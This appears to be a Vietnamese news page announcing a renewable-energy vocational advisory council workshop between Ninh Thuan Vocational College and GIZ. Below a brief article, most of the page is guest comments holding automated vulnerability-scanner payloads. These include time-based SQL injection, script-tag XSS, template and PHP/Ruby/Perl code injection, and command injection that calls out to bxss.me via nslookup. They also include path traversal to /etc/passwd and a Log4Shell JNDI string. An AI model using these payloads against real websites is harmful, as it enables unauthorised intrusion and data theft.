HỘI THẢO KHỞI ĐỘNG HỘI ĐỒNG TƯ VẤN NGHỀ VỀ NĂNG LƯỢNG TÁI TẠO
20-05-2024 08:01 SA
Với sứ mệnh dẫn đầu trong cuộc cách mạng năng lượng sạch, Việt Nam đang chứng kiến những bước tiến vượt bậc trong hợp tác giữa các ngành công nghiệp với giáo dục nghề nghiệp.
Một minh chứng nổi bật là sự kiện khởi động Hội đồng tư vấn nghề về Năng lượng tái tạo, một sáng kiến chung giữa Trường Cao đẳng nghề Ninh Thuận và Tổ chức Hợp tác Quốc tế Đức (GIZ).
Hội thảo này không chỉ là cú hit mở đường cho những thay đổi bền vững mà còn là cơ hội để các bên liên quan chia sẻ tri thức và kết nối sâu sắc hơn. Đến với hội thảo, các nhà lãnh đạo doanh nghiệp cùng chuyên gia đầu ngành sẽ cùng nhau thiết lập những chương trình đào tạo chuyên sâu, nhằm chuẩn bị một lực lượng lao động từ trường Cao đẳng Nghề Ninh Thuận (NTVC) đủ sức mạnh và kỹ năng để đáp ứng nhu cầu của thị trường năng lượng tái tạo đang trên đà mở rộng.

Hội thảo tạo dựng một diễn đàn gặp gỡ và trao đổi không chỉ về kinh nghiệm mà còn về những ý tưởng tiên tiến nhất. Mỗi ý kiến đóng góp sẽ là bước đệm vững chắc để định hình tương lai năng lượng của quốc gia.
Với tầm nhìn chung cùng hướng về tương lai, nơi mà năng lượng tái tạo không chỉ giúp bảo vệ môi trường mà còn tạo ra những cơ hội kinh tế, xã hội lớn lao - hành trình mới về ngành NLTT hứa hẹn sẽ phát triển vượt bậc trong thời gian tới tại Ninh Thuận.
Quỳnh Trân
 • Nguyễn Võ Quỳnh Trân
  Chia sẻ:

 • Bình luận
  Khách 22-07-2024 01:23 SA
  @@j49AT
  Khách 22-07-2024 01:23 SA
  1����%2527%2522
  Khách 22-07-2024 01:23 SA
  1'"
  Khách 22-07-2024 01:23 SA
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 22-07-2024 01:23 SA
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 22-07-2024 01:23 SA
  6YtN6mj9')) OR 296=(SELECT 296 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:22 SA
  PsdX9xr6') OR 45=(SELECT 45 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:22 SA
  xrEownB4' OR 310=(SELECT 310 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:22 SA
  -1)) OR 697=(SELECT 697 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:22 SA
  -5) OR 421=(SELECT 421 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:22 SA
  -5 OR 416=(SELECT 416 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:22 SA
  8xWV5uBr')); waitfor delay '0:0:15' --
  Khách 22-07-2024 01:22 SA
  jIKLCphi'); waitfor delay '0:0:15' --
  Khách 22-07-2024 01:22 SA
  7YAHnYVZ'; waitfor delay '0:0:15' --
  Khách 22-07-2024 01:22 SA
  1 waitfor delay '0:0:15' --
  Khách 22-07-2024 01:22 SA
  -1)); waitfor delay '0:0:15' --
  Khách 22-07-2024 01:22 SA
  -1); waitfor delay '0:0:15' --
  Khách 22-07-2024 01:22 SA
  -1; waitfor delay '0:0:15' --
  Khách 22-07-2024 01:22 SA
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 22-07-2024 01:22 SA
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 22-07-2024 01:22 SA
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 22-07-2024 01:22 SA
  if(now()=sysdate(),sleep(15),0)
  Khách 22-07-2024 01:22 SA
  -1 OR 3+306-306-1=0+0+0+1
  Khách 22-07-2024 01:22 SA
  -1 OR 2+306-306-1=0+0+0+1
  Khách 22-07-2024 01:21 SA
  1*
  Khách 22-07-2024 01:21 SA
  1*
  Khách 22-07-2024 01:21 SA
  1*
  Khách 22-07-2024 01:21 SA
  1*
  Khách 22-07-2024 01:21 SA
  c4gAL1kr
  Khách 22-07-2024 12:34 SA
  @@GR9sg
  Khách 22-07-2024 12:34 SA
  1����%2527%2522
  Khách 22-07-2024 12:34 SA
  1'"
  Khách 22-07-2024 12:34 SA
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 22-07-2024 12:34 SA
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 22-07-2024 12:34 SA
  cn7nw7xi')) OR 297=(SELECT 297 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:34 SA
  JjNjnl8w') OR 455=(SELECT 455 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:34 SA
  QNqf0xFF' OR 611=(SELECT 611 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:34 SA
  -1)) OR 610=(SELECT 610 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:34 SA
  -5) OR 228=(SELECT 228 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:34 SA
  -5 OR 778=(SELECT 778 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:34 SA
  CZbKwF4m')); waitfor delay '0:0:15' --
  Khách 22-07-2024 12:34 SA
  Sir9LO1e'); waitfor delay '0:0:15' --
  Khách 22-07-2024 12:34 SA
  abdbDWGU'; waitfor delay '0:0:15' --
  Khách 22-07-2024 12:34 SA
  1 waitfor delay '0:0:15' --
  Khách 22-07-2024 12:34 SA
  -1)); waitfor delay '0:0:15' --
  Khách 22-07-2024 12:34 SA
  -1); waitfor delay '0:0:15' --
  Khách 22-07-2024 12:34 SA
  -1; waitfor delay '0:0:15' --
  Khách 22-07-2024 12:34 SA
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 22-07-2024 12:34 SA
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 22-07-2024 12:34 SA
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 22-07-2024 12:34 SA
  if(now()=sysdate(),sleep(15),0)
  Khách 22-07-2024 12:34 SA
  -1 OR 3+964-964-1=0+0+0+1
  Khách 22-07-2024 12:34 SA
  -1 OR 2+964-964-1=0+0+0+1
  Khách 22-07-2024 12:34 SA
  1*
  Khách 22-07-2024 12:34 SA
  1*
  Khách 22-07-2024 12:34 SA
  1*
  Khách 22-07-2024 12:34 SA
  1*
  Khách 22-07-2024 12:34 SA
  JugIw20Y
  Khách 21-07-2024 11:19 CH
  @@ESO3m
  Khách 21-07-2024 11:19 CH
  1����%2527%2522
  Khách 21-07-2024 11:19 CH
  1'"
  Khách 21-07-2024 11:18 CH
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 21-07-2024 11:18 CH
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 21-07-2024 11:18 CH
  MEdqMUnn')) OR 297=(SELECT 297 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:18 CH
  81ZwpixC') OR 71=(SELECT 71 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:18 CH
  2EgzBlkB' OR 207=(SELECT 207 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:18 CH
  -1)) OR 761=(SELECT 761 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:18 CH
  -5) OR 435=(SELECT 435 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:18 CH
  -5 OR 256=(SELECT 256 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:18 CH
  mMZKVukA')); waitfor delay '0:0:15' --
  Khách 21-07-2024 11:18 CH
  gl3mC8Ed'); waitfor delay '0:0:15' --
  Khách 21-07-2024 11:18 CH
  i8zRpRjI'; waitfor delay '0:0:15' --
  Khách 21-07-2024 11:18 CH
  1 waitfor delay '0:0:15' --
  Khách 21-07-2024 11:18 CH
  -1)); waitfor delay '0:0:15' --
  Khách 21-07-2024 11:18 CH
  -1); waitfor delay '0:0:15' --
  Khách 21-07-2024 11:18 CH
  -1; waitfor delay '0:0:15' --
  Khách 21-07-2024 11:18 CH
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 21-07-2024 11:18 CH
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 21-07-2024 11:18 CH
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 21-07-2024 11:18 CH
  if(now()=sysdate(),sleep(15),0)
  Khách 21-07-2024 11:18 CH
  -1 OR 3+10-10-1=0+0+0+1
  Khách 21-07-2024 11:18 CH
  -1 OR 2+10-10-1=0+0+0+1
  Khách 21-07-2024 11:18 CH
  1*
  Khách 21-07-2024 11:18 CH
  1*
  Khách 21-07-2024 11:18 CH
  1*
  Khách 21-07-2024 11:18 CH
  1*
  Khách 21-07-2024 11:18 CH
  vEX2aaMD
  Khách 21-07-2024 01:17 SA
  }body{acu:Expre/**/SSion(9BVr(9381))}
  Khách 21-07-2024 01:17 SA
  <ScRiPt>9BVr(9541)</sCripT>
  Khách 21-07-2024 01:17 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%39%42%56%72%289723%29%3C%2F%73%43%72%69%70%54%3E
  Khách 21-07-2024 01:17 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 21-07-2024 01:17 SA
  acx__${98991*97996}__::.x
  Khách 21-07-2024 01:17 SA
  acx[[${98991*97996}]]xca
  Khách 21-07-2024 01:17 SA
  acx{{98991*97996}}xca
  Khách 21-07-2024 01:17 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 21-07-2024 01:17 SA
  <%={{={@{#{${acx}}%>
  Khách 21-07-2024 01:17 SA
  acux9919��z1��z2a�bcxuca9919
  Khách 21-07-2024 01:17 SA
  acu9679<s1﹥s2ʺs3ʹuca9679
  Khách 21-07-2024 01:17 SA
  9340127<
  Khách 21-07-2024 01:17 SA
  9340127
  Khách 20-07-2024 12:07 CH
  }body{acu:Expre/**/SSion(JPW4(9815))}
  Khách 20-07-2024 12:07 CH
  <ScRiPt>JPW4(9455)</sCripT>
  Khách 20-07-2024 12:07 CH
  %0D%0A%3C%53%63%52%69%50%74%20%3E%4A%50%57%34%289451%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 12:07 CH
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 12:07 CH
  acx__${98991*97996}__::.x
  Khách 20-07-2024 12:07 CH
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 12:07 CH
  acx{{98991*97996}}xca
  Khách 20-07-2024 12:07 CH
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 12:06 CH
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 12:06 CH
  acux7837��z1��z2a�bcxuca7837
  Khách 20-07-2024 12:06 CH
  acu1207<s1﹥s2ʺs3ʹuca1207
  Khách 20-07-2024 12:06 CH
  9736773<
  Khách 20-07-2024 12:06 CH
  9736773
  Khách 20-07-2024 08:44 SA
  }body{acu:Expre/**/SSion(dLiM(9048))}
  Khách 20-07-2024 08:44 SA
  <ScRiPt>dLiM(9672)</sCripT>
  Khách 20-07-2024 08:44 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%64%4C%69%4D%289626%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 08:44 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 08:44 SA
  acx__${98991*97996}__::.x
  Khách 20-07-2024 08:44 SA
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 08:44 SA
  acx{{98991*97996}}xca
  Khách 20-07-2024 08:44 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 08:44 SA
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 08:44 SA
  acux3030��z1��z2a�bcxuca3030
  Khách 20-07-2024 08:44 SA
  acu5969<s1﹥s2ʺs3ʹuca5969
  Khách 20-07-2024 08:44 SA
  9769836<
  Khách 20-07-2024 08:43 SA
  9769836
  Khách 20-07-2024 08:12 SA
  }body{acu:Expre/**/SSion(SHe8(9937))}
  Khách 20-07-2024 08:12 SA
  <ScRiPt>SHe8(9012)</sCripT>
  Khách 20-07-2024 08:12 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%53%48%65%38%289156%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 08:12 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 08:12 SA
  acx__${98991*97996}__::.x
  Khách 20-07-2024 08:12 SA
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 08:12 SA
  acx{{98991*97996}}xca
  Khách 20-07-2024 08:12 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 08:11 SA
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 08:11 SA
  acux2961��z1��z2a�bcxuca2961
  Khách 20-07-2024 08:11 SA
  acu5747<s1﹥s2ʺs3ʹuca5747
  Khách 20-07-2024 08:11 SA
  9227912<
  Khách 20-07-2024 08:11 SA
  9227912
  Khách 20-07-2024 07:54 SA
  }body{acu:Expre/**/SSion(CyzN(9278))}
  Khách 20-07-2024 07:54 SA
  <ScRiPt>CyzN(9646)</sCripT>
  Khách 20-07-2024 07:54 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%43%79%7A%4E%289101%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 07:53 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 07:53 SA
  acx__${98991*97996}__::.x
  Khách 20-07-2024 07:53 SA
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 07:53 SA
  acx{{98991*97996}}xca
  Khách 20-07-2024 07:53 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:53 SA
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:53 SA
  acux10523��z1��z2a�bcxuca10523
  Khách 20-07-2024 07:53 SA
  acu8173<s1﹥s2ʺs3ʹuca8173
  Khách 20-07-2024 07:53 SA
  9456048<
  Khách 20-07-2024 07:53 SA
  9456048
  Khách 20-07-2024 07:37 SA
  }body{acu:Expre/**/SSion(8q5s(9268))}
  Khách 20-07-2024 07:37 SA
  <ScRiPt>8q5s(9990)</sCripT>
  Khách 20-07-2024 07:37 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%38%71%35%73%289056%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 07:36 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 07:36 SA
  acx__${98991*97996}__::.x
  Khách 20-07-2024 07:36 SA
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 07:36 SA
  acx{{98991*97996}}xca
  Khách 20-07-2024 07:36 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:36 SA
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:36 SA
  acux1235��z1��z2a�bcxuca1235
  Khách 20-07-2024 07:36 SA
  acu3857<s1﹥s2ʺs3ʹuca3857
  Khách 20-07-2024 07:36 SA
  9558757<
  Khách 20-07-2024 07:36 SA
  9558757
  Khách 20-07-2024 07:19 SA
  }body{acu:Expre/**/SSion(xU88(9157))}
  Khách 20-07-2024 07:19 SA
  <ScRiPt>xU88(9453)</sCripT>
  Khách 20-07-2024 07:19 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%78%55%38%38%289241%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 07:19 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 07:19 SA
  acx__${98991*97996}__::.x
  Khách 20-07-2024 07:19 SA
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 07:18 SA
  acx{{98991*97996}}xca
  Khách 20-07-2024 07:18 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:18 SA
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:18 SA
  acux5599��z1��z2a�bcxuca5599
  Khách 20-07-2024 07:18 SA
  acu5035<s1﹥s2ʺs3ʹuca5035
  Khách 20-07-2024 07:18 SA
  9540955<
  Khách 20-07-2024 07:18 SA
  9540955
  Khách 20-07-2024 02:53 SA
  @@hVs4Q
  Khách 20-07-2024 02:53 SA
  1����%2527%2522
  Khách 20-07-2024 02:53 SA
  1'"
  Khách 20-07-2024 02:53 SA
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 20-07-2024 02:52 SA
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 20-07-2024 02:52 SA
  uv4S2DDX')) OR 606=(SELECT 606 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:51 SA
  3xcs0gvL') OR 166=(SELECT 166 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:51 SA
  V4nbe59R' OR 82=(SELECT 82 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:51 SA
  -1)) OR 437=(SELECT 437 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:50 SA
  -5) OR 423=(SELECT 423 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:50 SA
  -5 OR 259=(SELECT 259 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:50 SA
  sbTqRb3E')); waitfor delay '0:0:15' --
  Khách 20-07-2024 02:50 SA
  aKVhZVHl'); waitfor delay '0:0:15' --
  Khách 20-07-2024 02:50 SA
  AAXOblMS'; waitfor delay '0:0:15' --
  Khách 20-07-2024 02:50 SA
  1 waitfor delay '0:0:15' --
  Khách 20-07-2024 02:49 SA
  -1)); waitfor delay '0:0:15' --
  Khách 20-07-2024 02:49 SA
  -1); waitfor delay '0:0:15' --
  Khách 20-07-2024 02:49 SA
  -1; waitfor delay '0:0:15' --
  Khách 20-07-2024 02:48 SA
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 20-07-2024 02:48 SA
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 20-07-2024 02:48 SA
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 20-07-2024 02:47 SA
  if(now()=sysdate(),sleep(15),0)
  Khách 20-07-2024 02:47 SA
  -1 OR 3+319-319-1=0+0+0+1
  Khách 20-07-2024 02:47 SA
  -1 OR 2+319-319-1=0+0+0+1
  Khách 20-07-2024 02:47 SA
  1*
  Khách 20-07-2024 02:47 SA
  1*
  Khách 20-07-2024 02:47 SA
  1*
  Khách 20-07-2024 02:47 SA
  1*
  Khách 20-07-2024 02:47 SA
  ogbNAoGf
  Khách 20-07-2024 02:21 SA
  /xfs.bxss.me
  Khách 20-07-2024 02:21 SA
  9619512
  Khách 20-07-2024 02:21 SA
  bxss.me/t/xss.html?%00
  Khách 20-07-2024 02:21 SA
  HttP://bxss.me/t/xss.html?%00
  Khách 20-07-2024 02:21 SA
  '"
  Khách 20-07-2024 02:21 SA
  bxss.me
  Khách 20-07-2024 02:21 SA
  '.print(md5(31337)).'
  Khách 20-07-2024 02:20 SA
  ${@print(md5(31337))}\
  Khách 20-07-2024 02:20 SA
  ${@print(md5(31337))}
  Khách 20-07-2024 02:20 SA
  ";print(md5(31337));$a="
  Khách 20-07-2024 02:20 SA
  http://bxss.me/t/fit.txt?.jpg
  Khách 20-07-2024 02:20 SA
  Http://bxss.me/t/fit.txt
  Khách 20-07-2024 02:20 SA
  1some_inexistent_file_with_long_name.jpg
  Khách 20-07-2024 02:20 SA
  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  Khách 20-07-2024 02:20 SA
  ';print(md5(31337));$a='
  Khách 20-07-2024 02:20 SA
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  Khách 20-07-2024 02:20 SA
  149/.
  Khách 20-07-2024 02:20 SA
  149
  Khách 20-07-2024 02:20 SA
  149
  Khách 20-07-2024 02:20 SA
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  Khách 20-07-2024 02:20 SA
  '+'A'.concat(70-3).concat(22*4).concat(105).concat(66).concat(118).concat(89)+(require'socket' Socket.gethostbyname('hitqn'+'poqrjgeg20fdd.bxss.me.')[3].to_s)+'
  Khách 20-07-2024 02:20 SA
  "+"A".concat(70-3).concat(22*4).concat(104).concat(72).concat(109).concat(90)+(require"socket" Socket.gethostbyname("hitbi"+"hexdlvqu2d2a3.bxss.me.")[3].to_s)+"
  Khách 20-07-2024 02:20 SA
  ".gethostbyname(lc("hitko"."pliuhuay227b4.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(72).chr(110).chr(68)."
  Khách 20-07-2024 02:20 SA
  '.gethostbyname(lc('hitlf'.'egszfgal3b83d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(71).chr(97).chr(89).'
  Khách 20-07-2024 02:20 SA
  ctime sleep p0 (I30 tp1 Rp2 .
  Khách 20-07-2024 02:20 SA
  &n911998=v911952
  Khách 20-07-2024 02:20 SA
  ^(#$!@#$)(()))******
  Khách 20-07-2024 02:20 SA
  !(()&&!|*|*|
  Khách 20-07-2024 02:20 SA
  )
  Khách 20-07-2024 02:20 SA
  '"()
  Khách 20-07-2024 02:20 SA
  ./
  Khách 20-07-2024 02:20 SA
  ../
  Khách 20-07-2024 02:20 SA
  ../../../../../../../../../../../../../../windows/win.ini
  Khách 20-07-2024 02:20 SA
  ../../../../../../../../../../../../../../etc/passwd
  Khách 20-07-2024 02:20 SA
  12345'"\'\");|]*{ <>�''💡
  Khách 20-07-2024 02:20 SA
  ${9999906+9999072}
  Khách 20-07-2024 02:19 SA
  ;(nslookup hitmzcypihmlk108be.bxss.me||perl -e "gethostbyname('hitmzcypihmlk108be.bxss.me')")|(nslookup hitmzcypihmlk108be.bxss.me||perl -e "gethostbyname('hitmzcypihmlk108be.bxss.me')")&(nslookup hitmzcypihmlk108be.bxss.me||perl -e "gethostbyname('hitmzcypihmlk108be.bxss.me')")
  Khách 20-07-2024 02:19 SA
  `(nslookup hitsoriegwqsvd50ba.bxss.me||perl -e "gethostbyname('hitsoriegwqsvd50ba.bxss.me')")`
  Khách 20-07-2024 02:19 SA
  |(nslookup hitwdoftolzqwc03a9.bxss.me||perl -e "gethostbyname('hitwdoftolzqwc03a9.bxss.me')")
  Khách 20-07-2024 02:19 SA
  &(nslookup hitqitklzdtng4e622.bxss.me||perl -e "gethostbyname('hitqitklzdtng4e622.bxss.me')")&'\"`0&(nslookup hitqitklzdtng4e622.bxss.me||perl -e "gethostbyname('hitqitklzdtng4e622.bxss.me')")&`'
  Khách 20-07-2024 02:19 SA
  $(nslookup hitdkfwbkmbym9386f.bxss.me||perl -e "gethostbyname('hitdkfwbkmbym9386f.bxss.me')")
  Khách 20-07-2024 02:19 SA
  (nslookup hitfthfjlgskce12d3.bxss.me||perl -e "gethostbyname('hitfthfjlgskce12d3.bxss.me')")
  Khách 20-07-2024 02:19 SA
  |echo beulqt$()\ apiemm\nz^xyu||a #' |echo beulqt$()\ apiemm\nz^xyu||a #|" |echo beulqt$()\ apiemm\nz^xyu||a #
  Khách 20-07-2024 02:19 SA
  &echo dtftup$()\ cpurrg\nz^xyu||a #' &echo dtftup$()\ cpurrg\nz^xyu||a #|" &echo dtftup$()\ cpurrg\nz^xyu||a #
  Khách 20-07-2024 02:19 SA
  echo vyefrw$()\ cimdyk\nz^xyu||a #' &echo vyefrw$()\ cimdyk\nz^xyu||a #|" &echo vyefrw$()\ cimdyk\nz^xyu||a #
  Khách 20-07-2024 02:19 SA
  TvYSwXit
  Khách 20-07-2024 02:19 SA
  "+response.write(9580169*9056824)+"
  Khách 20-07-2024 02:19 SA
  '+response.write(9580169*9056824)+'
  Khách 20-07-2024 02:19 SA
  response.write(9580169*9056824)
  Khách 20-07-2024 02:19 SA
  /../../../../../../../../../../windows/system32/BITSADMIN.exe
  Khách 20-07-2024 02:19 SA
  ${j${::-n}di:dns${::-:}//hitdryafgffwwc500b${::-.}bxss.me}
  Khách 20-07-2024 02:19 SA
  1DBbiXYvSNO
  Khách 19-07-2024 10:12 CH
  @@RzSU3
  Khách 19-07-2024 10:12 CH
  1����%2527%2522
  Khách 19-07-2024 10:12 CH
  1'"
  Khách 19-07-2024 10:12 CH
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 19-07-2024 10:12 CH
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 19-07-2024 10:11 CH
  QUGI0V63')) OR 208=(SELECT 208 FROM PG_SLEEP(15))--
  Khách 19-07-2024 10:11 CH
  jRvRFgpQ') OR 727=(SELECT 727 FROM PG_SLEEP(15))--
  Khách 19-07-2024 10:11 CH
  S0gSOPxd' OR 725=(SELECT 725 FROM PG_SLEEP(15))--
  Khách 19-07-2024 10:11 CH
  -1)) OR 480=(SELECT 480 FROM PG_SLEEP(15))--
  Khách 19-07-2024 10:10 CH
  -5) OR 99=(SELECT 99 FROM PG_SLEEP(15))--
  Khách 19-07-2024 10:10 CH
  -5 OR 816=(SELECT 816 FROM PG_SLEEP(15))--
  Khách 19-07-2024 10:10 CH
  dEns27z5')); waitfor delay '0:0:15' --
  Khách 19-07-2024 10:09 CH
  ashOayEP'); waitfor delay '0:0:15' --
  Khách 19-07-2024 10:09 CH
  cwtOaJqr'; waitfor delay '0:0:15' --
  Khách 19-07-2024 10:08 CH
  1 waitfor delay '0:0:15' --
  Khách 19-07-2024 10:08 CH
  -1)); waitfor delay '0:0:15' --
  Khách 19-07-2024 10:07 CH
  -1); waitfor delay '0:0:15' --
  Khách 19-07-2024 10:07 CH
  -1; waitfor delay '0:0:15' --
  Khách 19-07-2024 10:06 CH
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 19-07-2024 10:06 CH
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 19-07-2024 10:06 CH
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 19-07-2024 10:06 CH
  if(now()=sysdate(),sleep(15),0)
  Khách 19-07-2024 10:06 CH
  -1 OR 3+25-25-1=0+0+0+1
  Khách 19-07-2024 10:06 CH
  -1 OR 2+25-25-1=0+0+0+1
  Khách 19-07-2024 10:06 CH
  1*
  Khách 19-07-2024 10:06 CH
  1*
  Khách 19-07-2024 10:06 CH
  1*
  Khách 19-07-2024 10:06 CH
  1*
  Khách 19-07-2024 10:06 CH
  v12ElC16
  Khách 19-07-2024 09:41 CH
  9696427
  Khách 19-07-2024 09:41 CH
  149/.
  Khách 19-07-2024 09:41 CH
  149
  Khách 19-07-2024 09:41 CH
  149
  Khách 19-07-2024 09:41 CH
  '.print(md5(31337)).'
  Khách 19-07-2024 09:41 CH
  ${@print(md5(31337))}\
  Khách 19-07-2024 09:41 CH
  ${@print(md5(31337))}
  Khách 19-07-2024 09:41 CH
  ";print(md5(31337));$a="
  Khách 19-07-2024 09:41 CH
  ';print(md5(31337));$a='
  Khách 19-07-2024 09:41 CH
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  Khách 19-07-2024 09:41 CH
  /xfs.bxss.me
  Khách 19-07-2024 09:41 CH
  '+'A'.concat(70-3).concat(22*4).concat(120).concat(67).concat(104).concat(90)+(require'socket' Socket.gethostbyname('hitwg'+'zotdpbxabc077.bxss.me.')[3].to_s)+'
  Khách 19-07-2024 09:41 CH
  "+"A".concat(70-3).concat(22*4).concat(98).concat(86).concat(113).concat(86)+(require"socket" Socket.gethostbyname("hitqu"+"ynjqilqe7a984.bxss.me.")[3].to_s)+"
  Khách 19-07-2024 09:41 CH
  '"
  Khách 19-07-2024 09:41 CH
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  Khách 19-07-2024 09:41 CH
  bxss.me/t/xss.html?%00
  Khách 19-07-2024 09:41 CH
  HttP://bxss.me/t/xss.html?%00
  Khách 19-07-2024 09:41 CH
  ctime sleep p0 (I30 tp1 Rp2 .
  Khách 19-07-2024 09:41 CH
  bxss.me
  Khách 19-07-2024 09:41 CH
  http://bxss.me/t/fit.txt?.jpg
  Khách 19-07-2024 09:41 CH
  Http://bxss.me/t/fit.txt
  Khách 19-07-2024 09:41 CH
  1some_inexistent_file_with_long_name.jpg
  Khách 19-07-2024 09:41 CH
  ".gethostbyname(lc("hitfz"."xaqmkyehcb04f.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(84).chr(100).chr(89)."
  Khách 19-07-2024 09:41 CH
  '.gethostbyname(lc('hitul'.'rifssdsx0cf3d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(72).chr(120).chr(82).'
  Khách 19-07-2024 09:41 CH
